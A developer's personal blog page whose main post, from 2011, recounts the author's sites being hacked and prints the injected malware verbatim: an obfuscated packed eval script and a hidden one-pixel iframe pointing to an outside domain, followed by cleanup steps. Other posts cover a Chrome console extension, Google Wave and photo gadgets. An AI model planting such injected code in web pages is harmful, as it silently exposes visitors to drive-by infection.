Chomper Stomping jQuery/JavaScript/CSS 3/HTML 5, Java/PHP/Python/ActionScript, Git, Chrome/Firefox Extensions, Wordpress/Game/iPhone App Development and other random techie tidbits I've collected

29 Nov 2011

OH SHNIKES, WE’VE BEEN HAXORED!!!


Yes. It finally happened. After... 6 years? on the web I finally got hacked.

Two domains affected:

http://cmcculloh.com

http://hallelujahbutton.com

(this also of course affected all sub-domains of cmcculloh.com, such as blog.cmcculloh.com).

This morning I went to my site and was told by Chrome that I wasn't allowed to go in because my site was going to infect my machine with H.I.V. (well, not really, but that's how it felt).

Here's the screen I saw: [screenshot: Chrome's malware warning page]

THE VERY FIRST THING I DID WAS GO AND CHANGE ALL OF MY PASSWORDS. I even finally got around to creating multiple users and separating all domains/sub-domains into their own user accounts. This way if cmcculloh.com gets cracked again, blog.cmcculloh.com will have less chance of also being compromised.

It took me quite a while to figure out what the culprit was (and I'm still not 100% sure), but once I realized that hallelujahbutton.com is exactly one page long it was really easy to find a very likely suspect. This line of code:

<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\x5C\x62'+e(c)+'\134\142','g'),k[c]);return p;}('\x56\40\71\75\x55\x20\x54\x28)\73\71\x2EY\50\x39\x2E\130\50)\53\62)\x3BW\50\123.\x4F&\46\151\56u.N\x28\47M\x5C\x52\\c\x3D\47\51\x3D\75-\61\x29\173\x69\x2E\121\x28\'\\\120\134\x34\\\141\x5C\x318\\\x31\67\x5C\61\x36\x5C4\134\162\x5C\70\1341\x62\134\146\134\x62\'\x2B\x30.\x37(0.\x36\50)*\63\53\63\51\53\'\134\142\40h\\\61a\134\x31\x39\134\x31\65\\x\75\x5C\x22\x27\x2B0\x2E\67\x280\x2E\x36\x28\51\523+\x33\51+\47\x5C\42 \x5C\61\61\x5C\145\\10\\Z\134\x6A\\c\x5C\65\\j=\\\42\x5C\61\64\134\"\x5C\61\63\13412\x5C\x44\\\164\x5C5\134f\\\"B\\m\\4\\C\\\112\134n\134I\\o\134\x71\x5C\113\\F\\E\x5Cw\x5C8\x5C\x35\\\x79\\H\134a\x5C\70\x3A\\\x47\x27\530\x2E7\500.\x36\x28\x29*\x33\53\166)+\x27p\x5C\114\x5C\x79\x5C\x41\\\61\x63\134\x31\104\47\x2B\x30\x2E\x37(\x30\x2E6\x28)*\63\53v\x29+\47\\d\x5C\x67\x5C\x22\\1\x43\\\61\105\134f\\\61\x47\x5C\170\\\x38\134\144\72\1341\106\x5C\154\134g\x5C\x31\171\1341\x78\x5C1z\x5C1\102\x5C\61A\134\164.\\\x72\x5C\143\\\x31M\x5C\x6D\56\x31\x50\x5C\x6C\x5C\145\\\x6F\134\x34\134n\134\x31\117\134d\\\x31L\x5C\x31I\x5C\x7A\x5C\61\116\x5Ck\x5C\163\\\61\x4B\x5C\61\112\\\x31\x48\134\61j\\\61\x69\134\61\x6B\\1m\\q\1341l\1345\\1e\134\141\134s\\1\x64\134b\76\134\x31\x66\57\1341\150\134\141\\1\147\x5C\x31\164\x5C\61s\47);i.\165=\x27\x31\165\\\61\x77\x5Cw\\e\x5C\x31v\x5C\153\'+\x30.\67\50\x30.6\50)*\61o\51\53\x27\134\61\x6E\134\61\160\134\65\x5C\147\\\x7A\\\64\134\152\1341\162\134k\47+9.\61\x71\x28)\x7D',62,114,'\115\x61\x74h\174||10\x30\x7C\x78\x36\71|\61\64\65\x7C\x72and\157m|\x66\x6C\157or|\x78\674\174\145xp\x7C\61\64\66|4\x32|\x78\664\174\x316\60\x7C\1706\x44\174\x78\63\x44|1\x370\174\x7C\x64oc\165\x6De\x6Et
\x7Cx\67\62\174\67\x35\x7C5\x37|\170\x37\x33\174x6\x45\x7C1\x34\x31\174\174\170\662\1741\644\1741\x343|\1706\103\174c\157\157\153ie|2\x30\60\174\61\x36\x35\x7C\616\64\174x\63\102\x7Cx\x370\x7C16\x34\x6F\160\174\x70\157\174\x787\64\x69\x7C\6171|1\x35\x34\174\x78\66\106|\655\x7C1\x354\145\x7Cx3A\x7C\615\67\x7C\x3163\174\x78\x378\x7C\x5F_u\174in\144\x65\x78\x4F\146\x7C\x63\157\157\153ieE\156a\142\x6Ce\x64|74\174w\162it\145\174\x78\66\104\x74|\x6E\x61vigat\157r|\104a\x74e\x7C\x6E\x65w\x7Cva\x72\174\x69\146\x7C\x67\x65\164\x44\141t\145|\x73\x65\x74D\141t\145\x7C\170\x362\x6F\174\170\x365\174\170\x36\x36\162\141\174\x31\x36\63\164\x7C\170\620\x7C\x360\174\6150\x7C40\167\x7Cx6D\145\1741\66\x32a\174\x786\x37\x7C1\645\x69|\x78\668\1747\x32|\x365\174x30|x\63\x43|\1707\x32a\x7C\61\x351|x\x33\657\x7C\170\633\x7C\1703\65\x7C\x78\63\x38\174\170\x337\174\x37\63\x7C\7199\719\x399|40\174to\x55\124C\x53t\x72\151ng\x7C\x31\64\65\163|\170\63E\174\x31\x35\x35e\x7C\137|x\674\144|\170\x35F|16\63\155\174x\x36\x31\174\6161\174x69\145|\170\66\64\163\174\x78\62\x30\163r\x7Cx\62D\x7C\x78\66\63|\x78\62F\1744\x32\150\x7Cx3\x31\174\x783\x46\174\x7834\x7C67\x7C\x78\x36\70\x70|1\x35\x36|\x786\x31g\x65\174\65\x36\174\165\x73'.split('|'),0,{}))</script>
<iframe src="http://xmtudaac.cz.cc/?go=1" width="1" height="1"></iframe>

(I added a line break for legibility)

EEEEEWWWW!!!!!! I got pwned!!!

Not 100% sure if it is the iframe *and* the script, or just the iframe.

How did I fix it?

ssh'ed into the site and ran this command "grep -ir function\(p,a,c,k,e,d\) *". Found that it was in 46 files. Downloaded the entire site and then did a global find/replace in Sublime Text (Ctrl + Shift + h) on the entire script (that I pasted above) and replaced it with nothing. Then I did a follow up search on "function(p,a,c,k,e,d)" again to confirm it was cleaned. Then I deleted the contents of my site on the server and re-uploaded everything I wanted up there.

So, how did this happen? Who knows. I definitely wasn't the only one. I had, within the last week, used a Chrome App called ShiftEdit and given it my ftp credentials, so I initially thought it might have been them somehow. But then I realized that I share my server with at least 100 other sites. Chances are 99% of those people don't know anything about security, and a good 20 of them probably use "password1" as their password. If any of those people got hacked, it's just a small step once you're on the box to wrangle root access and run a shell script that eats HTML documents and poops them out with your script inside of them (no, I don't know how to do this, but I could most likely be doing it by the end of the week were I so nefariously inclined. It's not hard. USE A GOOD PASSWORD and DON'T REUSE IT ACROSS SITES).

So, anywho, I have cleaned my site and submitted my site to Google for verification so that we can get this error page back down. DON'T click the "proceed anyway" link. Because I'm just a guy and I could still be infected and not know it. Always just click the "go back" button. Once Google has OK'd it, the site will become available (as hallelujahbutton.com now has).

THANK YOU GOOGLE!!! YOU'RE AWESOME!!! Except that I *really* wish your error pages were more specific on EXACTLY what the problem was instead of making me hunt and hunt for it.

Also, I've deleted hallelujahbutton.com and set the domain name to expire. I completely forgot it existed and am too busy to want to deal with it anymore so, pruned!

14 Dec 2009

JavaScript Console v0.0.1

[screenshot: jsConsole]

So I just made this little extension for Chrome.

There were some pretty convoluted gymnastics I had to go through to get the console on the page and get it to execute the JS I wanted it to execute. Pretty much the only hook you have is an onClick (from what I can tell). They've got it locked down TIGHT.

This needs a LOT of experimentation done, but it looks like you can use it to define functions on the page through the console and call those functions. However, the functions do NOT persist. So, you can do:

function test(){
    alert('test');
}
test();

and "execute js" and an alert will come up and say "test".

But you can't do:

function test(){
    alert('test');
}

and "execute js" and then:

test();

and "execute js" and expect an alert to pop up.

I'm sure there are many sound reasons for this from a security standpoint, but it's annoying as hell to try and program for. It would be great if I could fix this and I have a few ideas as to how I can do that...
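The behaviour above, as an added example that is not part of the original post or the extension: it models why a function declared in one "execute js" run is gone in the next, and shows two ways to keep state between runs. The assumption is that each run evaluates the snippet in a fresh function scope (as `new Function` or a direct `eval` inside a function would); the post does not say how the extension actually injects the code, and the function is called `greet` here rather than `test`.

```javascript
// Added example, not code from the original post or the extension. Models the
// behaviour described above (a function defined in one "execute js" run is gone
// in the next) and shows two ways to keep state between runs. Assumption: each
// run evaluates the snippet in a fresh function scope; the post does not say how
// the extension really injects the code. Runs under Node.js.

// Each snippet gets its own function scope: declarations die with the run.
function runIsolated(code) {
  return new Function(code)();
}

// Indirect eval evaluates in the global scope, so declarations persist, but they
// become properties of the page's global object (window in a browser), visible
// to and clobberable by every other script on that page.
function runGlobal(code) {
  return (0, eval)(code);
}

// Persistent state without touching globals: every snippet receives the same
// sandbox object as `ctx` and stores what it wants to keep on it.
function makeSharedRunner(sandbox = {}) {
  return (code) => new Function("ctx", code)(sandbox);
}

function throwsReferenceError(fn) {
  try { fn(); return false; } catch (e) { return e instanceof ReferenceError; }
}

// The post's experiment, with the function named greet instead of test.
function demo() {
  // 1. Declare and call in the same run: works.
  const sameRun = runIsolated("function greet(){ return 'test'; } return greet();");
  // 2. Declare in one run, call in the next: ReferenceError, the function is gone.
  runIsolated("function greet(){ return 'test'; }");
  const lostBetweenRuns = throwsReferenceError(() => runIsolated("return greet();"));
  // 3. Global eval: survives between runs, at the cost of creating a new global.
  runGlobal("function greet(){ return 'test'; }");
  const keptViaGlobal = runGlobal("greet()");
  const leakedToGlobal = typeof globalThis.greet === "function";
  delete globalThis.greet; // clean up the global the demo just created
  // 4. Shared sandbox object: survives between runs, nothing added to globals.
  const run = makeSharedRunner();
  run("ctx.greet = function () { return 'test'; };");
  const keptViaSandbox = run("return ctx.greet();");
  const leakedViaSandbox = typeof globalThis.greet !== "undefined";
  return { sameRun, lostBetweenRuns, keptViaGlobal, leakedToGlobal, keptViaSandbox, leakedViaSandbox };
}

if (typeof require !== "undefined" && require.main === module) console.log(demo());
```

Of the two ways to persist state, the sandbox object is the one to prefer for a console injected into arbitrary pages: it gives the user the continuity they expect without defining names on the page's `window`, where page scripts could read or overwrite them.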

The main reason I'm making this is basically as a prototype/POC for the Status-bar Calculator port from FF since I'm going to have to do some very similar things to get the Calculator to show up in the bottom right hand corner (like this does).

EDIT: After publishing the extension, it was pointed out to me that Chrome already *has* a JavaScript console if you hit Ctrl + Shift + J. However, that console only allows single line input, whereas this allows for as many lines as you want, making this just a *little* more functional. It would be awesome if I could find a way to hook this console into that console.

Check out the project page.

5 Dec 2009

Google Wave Invitations

So after my previous post with the rousing endorsement for Wave (haha) it turns out I actually have 16 Wave invitations I can send out.

If anyone wants one, leave a comment with the e-mail you want me to send it to (if you don't want your e-mail sent to the world, just leave a blank comment or something and I'll look at the e-mail you used to make the comment)

4 Dec 2009

Google buys Etherpad

Google has purchased Etherpad to kill it so they won't have competition for Wave.

I'm a user of both Etherpad and Wave, and I can say without a doubt that Etherpad (right now) is better. This is crap. Doesn't really look "not evil" to me. Oh well.

Guess this means I'll have to take it out of my TOTW rotation (it was scheduled for the last Monday of Dec)...

2 Sep 2008

Google Chrome

5 Nov 2007

Desktop Sidebar Photo Slideshows

If you are creating a sidebar gadget that displays photos, you need to accommodate for both landscape and portrait and not force your user to choose one or the other. Google shockingly has done a horrible job of this.

I took some pictures of my beautiful wife over the weekend, and threw them onto my computer. I use Google desktop, so I thought I'd try out their photos gadget to see rotating pictures of her while I work. I ended up very frustrated.

Google's sidebar gadget allows you to choose between portrait, landscape or re-sizable. If you choose portrait or landscape, it automatically formats it perfectly for one or the other. If you choose re-sizable it allows you to expand or contract it to fit either. But there is no setting to make the picture automatically fit the current size (by throwing black bars around the picture or something). This is absurd. It means that all of the landscape pictures I took get clipped off at the edges if I am in portrait mode, or all the portrait pictures get clipped off if I am in landscape mode.

Windows Vista's sidebar did add in the black bars, but unbelievably gave you no option to resize! This meant that if you were viewing a portrait picture you could pretty much forget actually getting to see anything in the picture beyond just a vague idea of what it is. Even the landscape pictures were poorly scaled down causing people to look rather funny/goblin-esque/gimpy-eyed at times.

Google's gadget allows you to add as many local folders, and even websites, to harvest pictures from as you want; Windows' only allowed you to choose one folder, but did at least allow you to specify that you would like to include all sub-folders as well.

All in all I was very disappointed about my options for a miniature photo slide-show on my desktop. If anyone knows of any better options, please let me know.